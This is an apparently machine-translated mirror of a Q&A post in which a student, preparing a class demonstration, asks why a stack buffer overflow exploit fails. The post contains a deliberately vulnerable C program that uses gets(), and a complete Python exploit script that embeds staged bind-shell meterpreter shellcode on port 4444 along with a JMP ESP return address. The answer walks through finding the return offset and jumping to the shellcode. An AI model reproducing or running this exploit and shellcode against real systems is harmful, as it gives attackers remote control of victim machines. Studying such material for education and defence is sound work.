示例C程序上的緩沖區溢出
[英]Buffer Overflow on Sample C Program
問題描述
我是否可以知道如何增加示例C程序上ESP的長度,從而使我可以在堆棧上執行Shellcode。 但是,到目前為止,示例c程序的ESP長度僅為61,因此不足以用於Shellcode。 任何幫助表示贊賞! 這是針對初學者的課堂演示,我也是學生,所以我很新來緩沖溢出。
示例C程序
#include <stdio.h>
#include <string.h>
#pragma warning(disable: 4996)
int root(void)
{
printf("\n Root privileges given to the user \n");
return 0;
}
int user(void){
printf("\n Normal user privileges given to the user \n");
return 0;
}
int main(void)
{
char buff[15];
int pass = 0;
int max = 15;
printf("\n Enter the password : \n");
//fgets(buff, max, stdin);
gets(buff);
if (strcmp(buff, "thegeekstuff"))
{
printf("\n Wrong Password \n");
}
else
{
printf("\n Correct Password \n");
pass = 1;
}
if (pass == 1)
{
root();
} else {
user();
}
return 0;
}
漏洞利用的Python代碼(Win86)-bind_tcp_staged_meterpreter [LPORT = 4444]
*注意:在綁定外殼有效載荷之前添加了有關(add esp,-1500)的指令
#! python
import os
import sys
import subprocess
import binascii
import time
ESP_Address = bytes.fromhex('5954C377')
buf = ""
# Add ESP, -1500
buf += "\x81\xC4\x24\xFA\xFF\xFF"
# Bind Meterpreter Shell
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a\x02\x68"
buf += "\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89"
buf += "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57"
buf += "\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1"
buf += "\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x6a\x00"
buf += "\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36"
buf += "\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4"
buf += "\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"
bind_staged_shell_payload = bytes(buf, "utf-8")
Dummy_Data = ("A" * 35).encode()
final_payload = Dummy_Data + ESP_Address + bind_staged_shell_payload
p = subprocess.Popen('buffer_overflow.exe', stdin=subprocess.PIPE) #NOTE: no shell=True here
time.sleep(20)
p.stdin.write(final_payload)
p.communicate()[0]
p.stdin.close()
sys.exit(0)
在Windows XP SP 1中用於編譯C程序的代碼
gcc -Wl,--stack,4194304 -fno-stack-protector -m32 buffer_overflow.c -o buffer_overflow.exe
我嘗試過的...。很尷尬,沒有成功:
使用
-Wl,--stack,4194304選項編譯C程序試圖通過創建具有巨大緩沖區的偽變量來增加堆棧大小(顯然,這會使ESP的長度更短...)
以管理員身份運行cmd ...
關閉防火牆
使用nc IP_ADDRESS 4444測試連接性但連接被拒絕(綁定外殼未從漏洞利用代碼成功生成)-成功為分段有效負載建立連接后,將使用meterpreter處理程序
筆記
該程序不會將shellcode作為輸入而崩潰...但是,如果插入了100個字符的字符串,則該程序將崩潰。
1 個解決方案
解決方案1
0 2018-11-17 23:05:15
您沒有描述如何在堆棧中找到寄信人地址,以及為什么要添加“ add esp”,因此我將僅從一開始就幫助您獲取它,並希望它會對您有所幫助。
首先,您應該在調試器中運行該程序(我建議使用IDA Pro),並開始對其進行模糊測試,以查看返回地址在堆棧中的存儲位置。
之后,嘗試不要使用一些shellcode,並嘗試從代碼中運行root函數,這樣,如果它可以正常工作,則會顯示輸出字符串。 緩沖區應該看起來像這樣:“ A * return_address_offset + root_address”如果可以的話,您可以使用簡單的shellcode代替root函數,方法是將其放在緩沖區上,並用'jmp esp'覆蓋返回地址,這樣放置的shellcode在堆棧上將運行。 如果您不跳到堆棧上的shellcode,程序將把shellcode的前4個字節當作一個地址,然后嘗試去那里,並且該地址很可能是無效地址,因此程序將崩潰。
如果您不了解它是如何工作的,則應閱讀有關堆棧和調用約定以及程序如何從函數中調用和返回的信息。
有一個關於利用的教程 ,它也應該對您有幫助。
希望我能幫到您!
在一個簡單的C程序中使用gets()來利用Buffer Overflow
[英]exploiting Buffer Overflow using gets() in a simple C program
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.